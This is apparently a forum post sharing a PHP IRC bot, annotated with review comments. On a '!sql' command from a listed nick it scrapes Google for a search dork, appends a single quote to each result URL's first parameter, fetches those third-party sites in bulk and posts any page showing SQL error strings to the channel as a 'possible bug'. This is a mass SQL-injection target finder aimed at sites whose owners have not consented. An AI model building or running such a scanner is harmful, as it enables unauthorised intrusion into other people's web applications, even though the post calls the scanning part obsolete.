IRC Client – Website Vulnerability scanner

Hey guys,

This script can only be used as a template for creating a PHP-based IRC client/bot; its vulnerability-scanning functions are now useless.

This one comes from the Dark Ages of GRnet, enjoy 🙂

In any case, I take no responsibility for how the script runs or for any errors that might pop up on your computer.

<?php

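set_time_limit(0); // the read loop further down is unbounded; do not let max_execution_time kill it

/**
 * @author Atlantean.
 */

//########################INFORMATION##################################

$server = "global.irc.gr";    // IRC server to connect to
$port = 6667;                 // plain-text IRC port; nothing in this file negotiates TLS
$me = "php_scanner";          // nickname registered on connect; also used to detect being kicked
$channel = "#scripting";      // channel joined on connect and rejoined after a kick
$identify = "id";             // NOTE: unused — no IDENTIFY/NickServ message is sent anywhere in this file
$master = array("Atlantean"); // nicknames allowed to issue bot commands (matched by nick string only)

//EDIT THIS
$max_results = 500; // upper bound on the number of search results paged through
$threads = 10; // number of URLs fetched concurrently per curl_multi batch

//#####################################################################

// Substrings that, when found in a fetched page body, make the URL get reported as a "possible bug".
$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
    "mysql_result()", "Syntax Error", "You Have An error", "mysql error",
    "SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################

// socket_create() returns false on failure; the original passed that straight into socket_connect().
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false)
{
    echo "\n[-]Unable To create socket: " . socket_strerror(socket_last_error()) . "\n\n\n";
    exit;
}
if (!socket_connect($socket, $server, $port))
{
    echo "\n[-]Unable To connect...\n\n\n";
    socket_close($socket); // release the descriptor before bailing out
    exit;
}

// IRC registration: USER, NICK and the initial JOIN in one write. A false return means the
// connection is already unusable, so stop here instead of entering the read loop with a dead socket.
if (socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n") === false)
{
    echo "\n[-]Unable To send registration: " . socket_strerror(socket_last_error($socket)) . "\n\n\n";
    socket_close($socket);
    exit;
}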


//###############################Encode The Dork#############################

/**
 * Turn every byte of $s into a decimal HTML numeric entity ("&#NN;") and URL-encode the result.
 *
 * Works byte-wise, so multi-byte characters become one entity per byte, exactly as the
 * original bin2hex()/hexdec() version did. An empty string yields an empty string.
 *
 * @param string $s raw query text
 * @return string urlencode()d run of "&#NN;" entities
 */
function encodeDork($s)
{
    $entities = array();
    $length = strlen($s);
    for ($pos = 0; $pos < $length; $pos++)
    {
        // ord() is the decimal value of the byte, same as hexdec(bin2hex(...)).
        $entities[] = sprintf('&#%d;', ord($s[$pos]));
    }
    return urlencode(implode('', $entities));
}

//###############################cURL MULTI THREAD#############################

/**
 * Drive every transfer on a curl_multi stack to completion.
 *
 * Calls curl_multi_exec() at least once and keeps calling it while it reports
 * transfers still running. NOTE(review): there is no curl_multi_select() between
 * calls, so this spins on the CPU while transfers are in flight.
 *
 * @param resource|CurlMultiHandle $curlHandle multi stack with handles already added
 * @return void
 */
function ExecHandle(&$curlHandle)
{
    $stillRunning = null;
    curl_multi_exec($curlHandle, $stillRunning);
    while ($stillRunning > 0)
    {
        curl_multi_exec($curlHandle, $stillRunning);
    }
}


// Main read loop. socket_read() returns up to 2048 bytes of raw server output, not a single IRC
// line, so one $read may hold several lines or a partial one; everything below assumes one line.
while ($read = socket_read($socket, 2048))
{
    // Split on single spaces: $cmd[0] is the ":nick!user@host" prefix (or a bare command such as
    // PING), $cmd[1] the IRC command, $cmd[2..] its parameters (the last still carries the CRLF).
    $cmd = explode(" ", $read);
    // Sender nick = text between the leading ':' and the first '!'. Lines without a ':' prefix
    // (e.g. PING) have no $nick[1], which leaves $nick empty and raises a notice.
    $nick = explode(':', $cmd[0]);
    $nick = explode('!', $nick[1]);
    $nick = strtolower($nick[0]);

    switch ($cmd[1])
    {
        case "KICK":
            // Rejoin the home channel when the kicked nick is ours.
            if ($cmd[3] == $me)
            {
                socket_write($socket, "\nJOIN :" . $channel . "\n");
            }
            break;
        case "PRIVMSG":
            // The only authorisation check: the lower-cased sender nick must appear in $master.
            // Nothing here verifies the account behind the nick, and the comparison is non-strict.
            if (in_array($nick, $master))
            {
                // $cmd[3] is the first word of the message text, still prefixed with ':'.
                switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
                {
                    case ":!join":
                        // $cmd[4] (the token after "!join") is written to the server verbatim.
                        socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
                        break;
                    case ":!exit":
                        // exit() receives socket_write()'s return value (byte count or false) as its status.
                        exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
                        break;
                    case ":!part":
                        socket_write($socket, "\nPART :" . $cmd[4] . "\n");
                        break;
                    case ":!sql":
                        // Only the single token after "!sql" is used as the search query (dork).
                        // chr(3) followed by "4" / "12" are IRC colour codes in the messages below.
                        if (!isset($cmd[4]))
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[-] Enter Dork!\r\n");
                        } else
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
                                chr(3) . "12[+] Dork : $cmd[4] \r\n");

                            $vuln_array = array();

                            // First results page. The regexes below target the search-engine HTML of the
                            // time; as the note at the top of the page says, they no longer match anything.
                            $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";

                            // No timeout and no error check: a false from curl_exec() is scanned like a page.
                            $ch = curl_init($google);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            $ret = curl_exec($ch);
                            curl_close($ch);

                            // Loose '!= false': a redirect body is taken to mean the client was blocked.
                            if (stristr($ret, '302 Moved') != false)
                            {
                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
                                break; // leaves the ":!sql" case, not the read loop
                            }

                            // Result count scraped from "of about <b>N</b>"; when the pattern does not
                            // match, $max[2][0] is undefined and the paging loop below does not run.
                            preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
                            $max = str_replace(",", "", $max[2][0]); // still a string; compared numerically below

                            $max = $max > $max_results ? $max_results : $max; // cap at the configured maximum
                            $i = 0;

                            // Page through the results using the start= offset.
                            while ($i < $max)
                            {

                                $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                                curl_setopt($ch, CURLOPT_HEADER, 0);
                                $ret = curl_exec($ch);

                                // $links[1] = href capture group of each result heading.
                                preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);

                                // '@' hides the notice when nothing matched.
                                if (@$links[1])
                                {
                                    foreach ($links[1] as $l)
                                    {
                                        // '!= false' also rejects a '=' at position 0.
                                        if (strpos($l, '=') != false)
                                        {
                                            // Keep everything up to the first '=' and append a quote;
                                            // the in_array() check keeps the list free of duplicates.
                                            $url = explode('=', $l);
                                            $url = $url[0] . "='";
                                            if (!in_array($url, $vuln_array))
                                            {
                                                array_push($vuln_array, $url);
                                            }
                                        }
                                    }
                                }

                                curl_close($ch);
                                // NOTE(review): when $max <= 10 the else branch assigns the pre-increment value
                                // back to $i ($i = $i++), so $i never advances and this loop does not terminate.
                                $i = $max > 10 ? $i += 10 : $i++;
                            }

                            array_unique($vuln_array); // return value discarded: no effect (list is already unique)
                            sort($vuln_array);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");

                            $p = 0;        // number of URLs reported as a "possible bug"
                            $o = $threads; // running "scanned" figure shown to the channel; steps by $threads even on a short last batch

                            $curlHandle = curl_multi_init();

                            // Process $vuln_array in batches of up to $threads URLs: fetch the batch in
                            // parallel, look for the $search strings, then drop it from the front of the array.
                            do
                            {

                                $tmp = count($vuln_array);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $cURL[$i] = curl_init($vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]); // redundant: curl_init() already set the URL
                                    curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
                                    curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
                                    curl_multi_add_handle($curlHandle, $cURL[$i]);
                                }

                                ExecHandle($curlHandle); // runs every transfer in the batch to completion

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $source[$i] = curl_multi_getcontent($cURL[$i]);
                                }


                                // Heuristic only: the first $search substring found in a body produces one
                                // report for that URL (the inner break), nothing is verified beyond that.
                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    foreach ($search as $error)
                                    {
                                        if (stristr($source[$i], $error) != false)
                                        {
                                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                                "12[+] Possible Bug Found: $vuln_array[$i]\n");
                                            $p++;
                                            break;
                                        }
                                    }
                                }


                                // Handles are removed from the multi stack but never curl_close()d; the
                                // unset($cURL) below drops the last references to them.
                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    curl_multi_remove_handle($curlHandle, $cURL[$i]);
                                    unset($vuln_array[$i]);
                                }
                                sort($vuln_array); // sort() reindexes from 0, so the next batch is again $vuln_array[0..]

                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                    "12[+] Scanned $o...\r\n");
                                $o += $threads;

                                unset($source);
                                unset($cURL);

                            } while (count($vuln_array) > 0);

                            curl_multi_close($curlHandle);

                            unset($vuln_array);
                            unset($source);
                            unset($cURL);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
                        }
                        break;
                }
            }
            break;
    }

    // PING lines have no ':' prefix, so the command sits in $cmd[0]; echo the server token back.
    if ($cmd[0] == "PING")
    {
        socket_write($socket, "PONG " . $cmd[1] . "\n");
    }
}
// Reached only when socket_read() returns false or an empty string (connection gone).
socket_close($socket);
?>